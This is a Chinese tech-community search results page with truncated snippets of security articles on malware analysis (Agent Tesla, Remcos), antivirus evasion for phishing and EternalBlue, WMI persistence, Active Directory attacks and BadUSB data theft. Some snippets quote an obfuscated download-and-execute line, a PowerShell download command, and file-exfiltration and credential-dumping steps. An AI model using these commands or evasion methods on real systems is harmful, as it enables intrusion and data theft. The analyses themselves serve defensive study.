首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

Quantum 构建工具使用新的 TTP 投递 Agent Tesla

【执行混淆代码】 【通过 MSHTA 执行远程服务器上的 HTA 文件】 HTA 文件包含多个千余行的垃圾 VBS 函数,其中只有一个与恶意行为有关。...【执行新的 PowerShell 代码】 IEX 函数执行 AES 解密与 GZIP 解压是关键的 PowerShell 代码: 从远程服务器下载 Agent Tesla 的 Payload 执行...通过将整数转换为字符然后替换空格并进一步利用 MSHTA 从远程 URL 执行 HTA 文件,如下所示。...【通过 LNK 执行 HTA 文件】 MSHTA 执行的 HTA 文件与之前感染链中使用的文件相同,加密数组转换为字符以形成可通过 Run 方法执行的 PowerShell 代码。...() 执行代码】 下载落地后,使用 Start-Process() 从 AppData 路径执行 Agent Tesla。

1.5K20
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    冒充银行钓鱼的Remcos RAT Dropper分析

    代码首先检查是否能够联网,接着下载并执行 Payload(3cc322e6044691b7b2ce8937d90dccf0cb6b6692cbee40742356777762c2cc71)。...daolnwod/moc.evil.evirdeno//:ptth''(eliFda';c3,we22 -Join '';IEX(([regex]::Matches(env:temp+ '\twt.vbs...') 第一阶段的 Payload 会加载下一阶段的 Payload,脚本使用了较为简单的方法(字符转十六进制)来隐藏下一阶段的恶意 URL。...△ tvt.vbs △ 第二阶段 第二阶段的 Payload 是 PowerShell 脚本: △ PowerShell 脚本 攻击链的最后是一个 .js 脚本( ef3e6b1fb39341321591d2df51a29ff0365d5e997bcb7a10f4f1fbcd1a8468dd...下图可见,代码中增加了许多垃圾内容进行混淆,在运行时用零替换不必要的字符串再启动动态链接库。

    58020

    钓鱼免杀?Miss?怎么可能?

    Vbs是Windows上的可执行文件,可以直接运行Windows的操作命令,但是vbs在渗透测试或者钓鱼中有个比较大的缺点,就是代码明文。...受害者或者蓝队可以直接阅读VBS的代码,可以很容易直接找出cs会连地址(Emmm至少在我本次使用的这个脚本里是这样),所以我们必须对VBS脚本进行加密,加密的工具为微软官方给出的加密软件screnc.exe...这个工具已经写进打包好的工具里,程序运行时会在C盘根目录下自动释放,程序自动生成VBS代码,对VBS文件进行加密,程序运行完成后会被删除。...工具特点: 本次使用的是VBS调用powershell执行命令的方式进行上线,程序执行成功后会在系统内存运行,不产生exe等可执行文件后台进程,减少被查杀的风险;而且当excel程序被受害者关闭后,仍然可以正常上线...从https://github.com/PDWR/3vilMacro/releases下载3vilMacro.exe文件。

    1.5K30

    MS17-010永恒之蓝绕过数字上线

    0x03 落地测试 开始我们是想直接写一个vbs下载者脚本远程下载一个免杀木马,或者是将免杀木马转为base64/hex编码后写入再使用certutil命令解码落地文件,最后执行上线。...\" 文件虽然写进去了,但在执行vbs下载者时被360拦截查杀了,而且也不能使用certitil命令解码,360也会拦截-decode、-decodehex,果断放弃了这两种方法,如下图所示。...这里我也尝试了下将脚本中的危险组件通过混淆来免杀,结果还是不行,大家可以自己去尝试下免杀这个脚本,或者找其他同类型的免杀vbs脚本,在这种场景下还是可以利用的。...或ReadAsByteArrayAsync方法读取文件内容); scriptblock类的Create方法将$content变量内容创建为一个代码块,Invoke方法执行代码块中的Powershell脚本或者命令...\\192.168.1.110\\FileShare\\artifact.exe (2) 或者我们也执行相关命令将SAM、SYSTEM或者lsass.exe进程的转储文件导出到匿名共享目录,然后再脱到我们本地用

    50710

    技术分享-持久性-WMI事件订阅

    从红队的角度来看,WMI 可用于执行多种活动,例如横向移动、持久性、态势感知、代码执行以及作为命令和控制(C2)。...然而,各种框架,如 Metasploit、Empire、PoshC2、PowerSploit 和多个 PowerShell 脚本和 C# 工具可用于自动化此技术,为代码执行提供不同的触发器和各种选项。...WMI-Persistence是另一个 PowerShell 脚本,它可以创建事件过滤器,在每次重新启动后 5 分钟内从远程位置执行基于 PowerShell 的有效负载。...(.NET 框架的一部分)可以编译源代码,以便将其转换为可执行文件。...默认情况下,此工具使用记事本,这是一个常见的 Windows 应用程序,但可以修改代码以针对任何其他常见进程,例如 word.exe、outlook.exe、excel.exe、calc.exe,具体取决于从主机收集的信息在态势感知期间

    2.8K10

    Active Directory中获取域管理员权限的攻击方法

    攻击通常从向一个或多个用户发送鱼叉式网络钓鱼电子邮件开始,使攻击者能够让他们的代码在目标网络内的计算机上运行。...其他文件类型也可能具有嵌入式密码(通常为明文),例如 vbs 和 bat。...凭证盗窃洗牌 我将此部分称为“凭据盗窃洗牌”(或“凭据洗牌”),因为很难简单地封装此活动。把它想象成一种舞蹈。破坏单个工作站、提升权限和转储凭据。...将此值设置为“True”将从涉及此系统的任何 WinRM 连接中删除加密,包括 PowerShell 远程处理。...截至 2015 年 10 月,还有一种Windows 方法利用 PowerShell 方法从 NTDS.dit 文件(和注册表系统配置单元)转储凭据,称为来自 DSInternals.com 的 Get-ADDBAccount

    5.2K10

    基于ArduinoLeonardo板子的BadUSB攻击实战

    前言 在Freebuf上许多同学已经对HID攻击谈了自己的看法,如维克斯同学的《利用Arduino快速制作Teensy BadUSB》无论从科普还是实践都给我们详尽的描述了BadUSB制作的相关过程,lpcdma...$url= 'http://127.0.0.1/PUTTY.EXE';$file = ' D:\\x.exe ';$clnt.DownloadFile($url,$file); 这个命令的意思大体是从服务器...,打包压缩,并在检测到有U盘插入时将文件传入U盘,此VBS代码在后台运行,等待时机,先用Arduino Leanardo传入代码,再用另一个U盘取出文件。...vbs代码实现如下,主要功能是通过模糊查询找到想要的文件,放到D:\fn(fileneeded)文件夹下,压缩后删除原文件并等待U盘插入,插入后将fn.rar传入U盘并删除目标电脑中的fn.rar和VBS...不过当今各种杀软对VBS脚本是严防死守,很多正常功能都报毒,没有高超的VBS免杀技术恐怕是难以完成了。

    2.1K70
    领券